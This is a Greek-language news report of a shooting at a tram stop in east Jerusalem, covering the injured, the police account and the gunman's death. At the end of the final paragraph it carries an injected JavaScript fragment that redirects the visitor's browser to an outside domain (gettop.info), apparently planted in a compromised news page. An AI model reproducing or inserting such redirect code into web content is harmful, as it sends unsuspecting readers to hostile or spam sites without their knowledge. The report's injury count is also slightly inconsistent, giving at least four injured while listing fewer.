Επίθεση Παλαιστινίου σε σταθμό τραμ στην Ιερουσαλήμ

0
7

 

Επίθεση με όπλο εναντίον Ισραηλινών που περίμεναν να επιβιβαστούν σε τραμ στην ανατολική Ιερουσαλήμ είχε αποτέλεσμα να τραυματισθούν τουλάχιστον τέσσερα άτομα, εκ των οποίων τα δύο σοβαρά. Ο δράστης έπεσε αμέσως νεκρός από αστυνομικά πυρά.

Όπως ανακοίνωσε η ισραηλινή αστυνομία, «ένας τρομοκράτης», ο οποίος κυκλοφορούσε με αυτοκίνητο κοντά στο αρχηγείο της αστυνομίας στην ανατολική Ιερουσαλήμ, άνοιξε πυρ εναντίον των περαστικών. Δύο γυναίκες, μία περαστική και μία αστυνομικός, βρίσκονται σε «κρίσιμη κατάσταση» ενώ ένα τρίτο άτομα έχει τραυματισθεί ελαφρά.

Ο δράστης διέφυγε τρέχοντας προς παλαιστινιακό προάστιο της πόλης, όπου τον εντόπισαν αστυνομικοί με μοτοσυκλέτες, και κατάφεραν και να τον «εξουδετερώσουν».

«Όταν ο τρομοκράτης εντόπισε τους αστυνομικούς πυροβόλησε εναντίον τους κι εκείνοι κατόρθωσαν να απαντήσουν στα πυρά και να τον σκοτώσουν» ανακοίνωσε ο εκπρόσωπος της αστυνομίας, που πρόσθεσε ότι κατά την ανταλλαγή των πυρών τραυματίσθηκε κι ένας αστυνομικός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here